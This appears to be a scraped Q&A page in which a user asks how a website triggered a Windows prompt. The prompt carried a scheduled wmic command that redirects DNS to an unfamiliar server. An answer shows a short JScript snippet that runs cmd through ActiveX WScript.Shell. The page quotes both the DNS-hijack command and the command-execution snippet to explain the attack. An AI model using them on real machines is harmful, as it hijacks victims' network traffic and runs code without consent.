How a browser manages to execute a command in cmd?
5,007
Phishers may use Javascript like this:
var wsh = new ActiveXObject('WScript.Shell');
command = 'cmd /k ' + 'what ever ...';
wsh.Run(command);
It works only if you turn off the security features in your browser which will need to use ActiveX.
Related videos on Youtube
02 : 46
How to fix "not recognized as internal or external Command " in Cmd
![How To Open a File from the Command Prompt In Windows 10/8/7 [Tutorial]](https://i.ytimg.com/vi/NA4zyB4b0eI/hq720.jpg?sqp=-oaymwEcCNAFEJQDSFXyq4qpAw4IARUAAIhCGAFwAcABBg==&rs=AOn4CLDFtZilYhfyuHPcYgLingEnqOtvlA)
02 : 47
How To Open a File from the Command Prompt In Windows 10/8/7 [Tutorial]
01 : 31
How a browser manages to execute a command in cmd?
07 : 31
Windows Command Line Tutorial - 1 - Introduction to the Command Prompt
07 : 25
How to Remotely Shutdown any Computer with CMD New 2018
Author by
Paul
Updated on September 18, 2022Comments
-
Paul almost 2 years
Some time ago while visiting some web site in Opera 12.12 following Windows 7 UAC prompt appeared on screen:
C:\Windows\SysWOW64\cmd.exe /c at 13:29:00 /every:T,M,Th,F,W,S,Su wmic.exe nicconfig where "IPEnabled=true" call SetDNSServerSearchOrder ("37.10.116.202", "8.8.8.8")Obviously, I declined it.
The method by which phishers attempted to get my data is pretty clear, but how they did manage to execute the command from browser?
-
Paul almost 10 yearsOops... Never knew that Opera is able to work with ActiveX. Thought that it works in IE only.
-
nixda almost 10 yearsWhat? ActiveX in Opera? As I understand this Opera help page, this isn't the case.
